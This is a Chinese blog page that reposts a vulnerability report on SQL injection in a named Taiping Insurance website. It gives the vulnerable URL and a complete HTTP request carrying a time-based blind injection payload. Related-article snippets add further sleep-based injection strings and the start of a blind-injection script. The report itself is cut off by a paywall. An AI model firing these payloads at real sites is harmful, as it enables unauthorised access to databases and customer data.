mysql测试权限_太平保险某站SQL注入2处root权限(MYSQL 附测试脚本)

最新推荐文章于 2023-08-13 11:00:17 发布
最新推荐文章于 2023-08-13 11:00:17 发布
阅读量297 收藏 1
点赞数
文章标签: mysql测试权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35965587/article/details/113460701
版权

当用户可控的数据未经过恰当的处理就进入了数据库执行的SQL语句中时,就可能存在SQL注入漏洞。攻击者可以定制特定的字符来改变SQL语句的语义。通过SQL注入漏洞可以造成多种危害,包括读取或者修改应用的数据,改变程序逻辑,提升权限和执行操作系统命令等。

1、漏洞触发页面以及对应功能:

~~

www.tpre.cntaiping.com/index.php/Home/Show/index/cid/20/id/

2、漏洞复现具体流程,包含具体payload和完整的数据包:

GET /index.php/Home/Show/index/cid/20/id/(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1

X-Requested-With: XMLHttpRequest

Referer: www.tpre.cntaiping.com

Cookie: PHPSESSID=rko1m2novndqh69v8fau0uusv4; lang=zh_hk

Host: www.tpre.cntaiping.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25

Accept: */*

2,</

最低0.47元/天 解锁文章
网速卡卡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
保险数据库:cs157的类项目,用于为保险公司设计SQL数据库
02-15
保险数据库 cs157的类项目,以为保险公司设计SQL数据库
中国太平保险集团2020年存储项目采购,上演“三国演义”
阿明观察
08-23 1446
很久不聊数据存储涉及的金融行业情况,阿明无意中看到了中国太平保险集团在2020年存储项目采购公布信息,这里简单说一下这三家2020年中标中国太平保险集团的存储品牌。 按照项目中标的时间先后顺序来看,Hitachi Vantara、NetApp、Dell EMC分别中标了中国太平保险集团的不同存储采购需求,不过都为该三个品牌存储的即有部署的扩容采购。感觉中国太平保险集团的存储项目采购,上演了一场别开生面的“三国演义”。 具体采购情况简单梳理一下: ↓↓↓ 1)2020年5月13日,中国太平保...
SQL强化(一)保险业务
weixin_30607029的博客
04-18 298
保险业务 : 表结构 : sql语句 : /*1. 根据投保人电话查询出 投保人 姓名 身份证号 所有保单 编号 险种 缴费类型*/SELECT t2.cust_name, t2.idcard, t4.pro_id, t5.pay_type_name, t6.protype_nameFROM contact t1, -- 联系表 customer t2, -- ...
CVE-2015-3934 sql盲注payload
qq_26317875的博客
04-15 1442
刚刚看到CVE-2015-3934这个sql注入漏洞,发现实验机器给的脚本不算太完整,略过了数据库名和表名的猜解,直接从字段名猜解开始了。这里以这个漏洞的payload为例,写一下整个的大体流程,也梳理一下。这个一个基于时间的sql盲注:python脚本,通过sql的sleep()函数控制时间,配合requests库中的timeout选项,来判断返回原查询语句为:用来判断注入点的语句为(语句包含单...
php二维数组根据键值返回,php二维数组根据指定键值重新排序
weixin_30571837的博客
04-09 431
:支持免登录发表评论12020-07-12 10:15:07 回复:支持免登录发表评论2021-03-08 19:53:56 回复:请先登录后回复评论2021-03-08 19:54:12 回复:请先登录后回复评论2021-03-08 19:54:18 回复:支持免登录发表评论2021-03-08 20:04:13 回复:支持免登录发表评论2021-03-08 20:04:14 回复:支持免登录发...
java代码实现文件或文件夹的压缩和解压
一个java小开发笔记
08-21 2528
这里写了个工具类,可以实现文件的压缩和解压功能。 package com.cntaiping.tpi.common.utils; import java.io.BufferedInputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import jav...
DES加解密
weixin_30483697的博客
01-20 55
最近遇到了前端需要des加密一个http的头部数据,所以在网上找了一些javascript直接写出来的des加解密框架,比对三个框架,三个不同的答案,并且三个答案都和服务器可以正确解密的秘钥不同。。。。 于是乎在同事的帮助下找到一个nodeJS可以正确解析的框架,但是nodeJS不可以跑在浏览器上,所以需要通过Browserify打包。打包出来的des3.js已经上传到了 https...
MYSQL.rar_MYSQL_ROOT_mysql root_root-Cyclic-Music_sql
09-22
mysql -u root -p Enter password:******* 出现Enter password提后输入root用户的密码,然后即进入mysql客户机的交互模式,可以看到下面的提示: Welcome to the MySQL monitor. Commands end with or \g. Your ...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
一键重置mysql的root密码脚本
12-15
@echo off title mysql ::从注册表找到Mysql的安装路径写入文件mysql.txt reg query HKLM\SYSTEM\ControlSet001\Services\MySQL | find /I ...FOR /F tokens^=2^ delims^=^" %%i in (C:\mysql.txt) do set mysqlPath=
MySQL中导出用户权限设置的脚本分享
12-15
对于这个迁移我们可以从mysql.user表来获取用户的相关权限来生成相应的SQL语句,然后在目标服务器上来执行生成的SQL语句即可。本文提供了生成提取用户权限脚本并给出演示。 1、生成用户权限脚本 代码如下: ...
截取遍历
weixin_30443895的博客
06-15 52
$().ready(function(){ var msn=window.location.search; //location.search是从当前URL的?号开始的字符串 a=1&b=1 var args=msn.split("?"); var strs=args[1]; var str=strs.split("&"); var parms=new Array(); for...
Java对于时间的理,计算时间差,比较时间,计算时间前后,时间相加
hongfei568718926的博客
08-22 786
Java对于时间的理,计算时间差,比较时间,计算时间前后,时间相加1.功能介绍2.实现代码 1.功能介绍 这个是一个实现类,实现了一下功能: (1)获取系统当前时间, (2)比较两个时间的先后, (3)计算当前时间加上指定天,月,年后返回的时间结果. 2.实现代码 package com.cntaiping.coverage.util; import com.cntaiping.sys.util.LogUtils; import java.text.DateFormat; import java.t
xml 的 <![CDATA["URL"]]>
weixin_30355437的博客
12-07 808
<![CDATA["URL"]]>:用于 xml 理特殊字符,比如:& <PolicyURL><![CDATA[  http://ectp.tpi.cntaiping.com/TPEBizWeb/pages/B2C/show/downLoad.do?  policyNo=D6865CDC44489697A3DACD472654550CB559324E0...
项目报错解决
最新发布
pawss的博客
08-13 183
clean后install。
问题查询-tomcat内存泄露
weixin_30657999的博客
08-05 717
1.报警信息 内容: 微信服务器向公众号推送消息或事件后,开发者5秒内没有返回 次数: 5分钟 239次 错误样例: [OpenID=o][Stamp=1562718361][3rdUrl=url][IP=ip][Event=Click Menu Url] 理: 从阿里云监控查看主机均正常运行中;查看各台服务器日志情况,其中一台服务器不打印日志,但进程还在。重启了该条服务器后,告警停止...
时间盲注脚本.py
weixin_30274627的博客
03-10 357
时间盲注脚本 1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 import requests 4 import time 5 6 payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.' #匹...
SQL注入 时间延时注入语句
qq_44806973的博客
11-15 2475
id=3 AND (SELECT 5537 FROM (SELECT(SLEEP(15)))PIKH) id=0’XOR(if(now()=sysdate(),sleep(6),0))XOR’Z
SQL注入可以说的二三事
crystal_shrimps的博客
05-31 1072
写在前面 数据库mysql 语言:java 代码审计发现,mybatis默认使用预编译#传参,只有少部分语句无法直接使用#传参,会报错,所以开发容易忽视这些地方,直接使用默认的.$传参,这就是我们测试sql注入的重要关注点。 order by like in 注入点(Mysql) Tip: http传参不能带空格,用+代替 比如注释符,mysql的注释符是--空格和#,从前端输入sql语句用--+,实际上经过url解码,传入数据库时变成--空格 普通参数注入 盲注 盲注三种类型 基于时间的 基于布尔的
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
07-08
In the document titled "Research on Penetration Testing of SQL Injection Security Vulnerabilities in Model-Driven Web Applications Using MySQL," the authors highlight the increasing significance of ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值